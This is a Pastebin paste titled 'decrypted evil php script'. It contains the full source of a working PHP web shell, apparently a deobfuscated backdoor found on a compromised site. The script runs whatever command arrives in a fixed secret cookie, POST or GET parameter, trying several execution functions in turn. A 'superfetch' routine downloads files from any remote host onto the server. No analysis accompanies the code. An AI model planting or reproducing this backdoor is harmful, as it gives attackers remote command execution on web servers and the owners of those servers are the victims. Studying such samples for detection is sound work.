SHARE
TWEET

decrypted evil php script

a guest Jan 6th, 2012 776 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. //adjust system variables
  3. if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
  4. //die with error
  5. function x_die($m){@header('HTTP/1.1 500 '.$m);@die();}
  6. //check if we can exec
  7. define('has_passthru',@function_exists('passthru'));
  8. define('has_system',@function_exists('system'));
  9. define('has_shell_exec',@function_exists('shell_exec'));
  10. define('has_popen',@function_exists('popen'));
  11. define('has_proc_open',@function_exists('proc_open'));
  12. define('has_exec',@function_exists('exec'));
  13. define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
  14. if(!can_exec){x_die('can not exec: no functions available');}
  15. //check if we can config
  16. define('has_ini_get',@function_exists('ini_get'));
  17. define('has_ini_get_all',@function_exists('ini_get_all'));
  18. define('can_config',(has_ini_get||has_ini_get_all));
  19. if(!can_config){x_die('can not config');}
  20. //get config value
  21. function x_ini_get($n){if(has_ini_get){return(@ini_get($n));}elseif(has_ini_get_all){$h=@ini_get_all();return($h[$n]['local_value']);}}
  22. // check safe mode
  23. if(x_ini_get('safe_mode')){x_die('can not exec: safe mode active');}
  24. //smart exec helpers
  25. function x_passthru($c){@passthru($c);}
  26. function x_system($c){@system($c);}
  27. function x_shell_exec($c){echo @shell_exec($c);}
  28. function x_popen($c){$o;if(($f=@popen($c,'r'))){while(!@feof($f)){$o.=@fgets($f);}@pclose($f);}echo $o;}
  29. function x_proc_open($c){$o;if(@is_resource($p=@proc_open($c,array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')),$f))){@fclose($f[0]);while(!@feof($f[1])){$o.=@fgets($f[1]);}@fclose($f[1]);@proc_close($p);}echo $o;}
  30. function x_exec($c){$o;@exec($c,$o);echo @implode("\n",$o);}
  31. //do smart fetch
  32. function x_superfetch($a,$p,$r,$l)
  33. {
  34.         if($s=@fsockopen($a,$p))
  35.         {
  36.                 if($f=@fopen($l,"wb"))
  37.                 {
  38.                         @fwrite($s,"GET ".$r." HTTP/1.0\r\n\r\n");
  39.                         while(!@feof($s))
  40.                         {
  41.                                 $b=@fread($s,8192);
  42.                                 @fwrite($f,$b);
  43.                         }
  44.                         @fclose($f);
  45.                         echo "OK\n";
  46.                 }
  47.                 @fclose($s);
  48.         }
  49. }
  50. //do smart exec
  51. function x_smart_exec($c)
  52. {
  53.         if($c==="which superfetch 1> /dev/null 2> /dev/null && echo OK")
  54.         {
  55.                 echo "OK\n";
  56.         }
  57.         elseif(@strstr($c,"superfetch"))
  58.         {
  59.                 $a=@explode(' ',$c);
  60.                 x_superfetch($a[1],$a[2],$a[3],$a[4]);
  61.         }
  62.         elseif(has_passthru){x_passthru($c);}
  63.         elseif(has_system){x_system($c);}
  64.         elseif(has_shell_exec){x_shell_exec($c);}
  65.         elseif(has_popen){x_popen($c);}
  66.         elseif(has_proc_open){x_proc_open($c);}
  67.         elseif(has_exec){x_exec($c);}
  68. }
  69. //go
  70. $n='SjJVkE6rkRYj';
  71. $c=$_COOKIE[$n];
  72. if(@empty($c)){$c=$_POST[$n];}
  73. if(@empty($c)){$c=$_GET[$n];}
  74. if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
  75. x_smart_exec($c);
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top